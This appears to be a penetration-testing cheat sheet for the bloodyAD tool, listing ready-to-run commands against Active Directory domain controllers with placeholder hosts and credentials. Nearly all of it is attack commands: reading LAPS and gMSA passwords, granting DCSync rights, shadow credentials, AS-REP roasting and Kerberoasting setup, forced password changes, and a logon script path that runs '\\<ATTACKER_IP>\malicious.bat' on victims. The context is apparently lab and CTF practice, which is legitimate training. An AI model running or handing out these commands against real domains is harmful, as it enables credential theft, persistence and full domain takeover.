🩸BloodyAD

Introduction

This tool can perform specific LDAP calls to a domain controller for Active Directory privilege escalation.

On Kali Linux, the tool can be installed simply through the following command:

sudo apt install bloodyad -y

GitHub Repository

GitHub Repository: CravateRouge/bloodyAD - BloodyAD is an Active Directory Privilege Escalation Framework

Attacking AD using bloodyAD

Read LAPS Password

bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime

Read GMSA Password

bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' get object 'TARGET' --attr msDS-ManagedPassword

Enable DONT_REQ_PREAUTH for ASREPRoast

Requires GenericAll/GenericWrite permissions

bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' add uac 'TARGET' -f DONT_REQ_PREAUTH

Disable ACCOUNTDISABLE to Enable a Disabled User

bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' remove uac 'TARGET' -f ACCOUNTDISABLE

Add User to a Group

bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' add groupMember 'GROUP_TARGET' 'USER_TARGET'

Shadow Credentials Attack

Followed by Pass-the-Hash

bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' add shadowCredentials 'target'

Assign servicePrincipalName (SPN) to User for Kerberoasting Attack

Requires GenericAll/GenericWrite permissions over the target user

bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' set object 'target' servicePrincipalName -v 'cifs/gzzcoo'

Make User Owner of an Object

Requires WriteOwner permissions

bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' set owner 'OBJECT_TARGET' 'USER_TARGET'

Assign GenericAll Permissions Over a User to an Object for Full Control

bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' add genericAll 'OBJECT_TARGET' 'USER_TARGET'

Change User Password

bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' set password 'USER_TARGET' 'Password01!'

Add DCSync Permissions Over an Object

bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' add dcsync 'OBJECT_TARGET'

Assign Malicious Script to User (Executes on Login)

bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' set object 'TARGET' scriptpath -v '\\<ATTACKER_IP>\malicious.bat'

Create New DNS Record for DNS Spoofing Attacks

bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' add dnsRecord <dns_record_target> <ATTACKER_IP>

Assign Different UPN (userPrincipalName) for UPN Spoofing Attacks

bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' set object 'user_target' mail -v 'impersonateUser@domain.htb'

Assign Value to altSecurityIdentities Attribute for X.509/ESC14 Attacks

bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' set object 'user_target' altSecurityIdentities -v 'X509:<I><.........>'

Notes

• Replace 10.10.10.10 with the target domain controller IP address

• Replace domain.htb with the target domain name

• Replace 'user' and 'password' with valid credentials

• Replace target placeholders (TARGET, USER_TARGET, OBJECT_TARGET, etc.) with actual target names

• Some commands require specific permissions as noted in their descriptions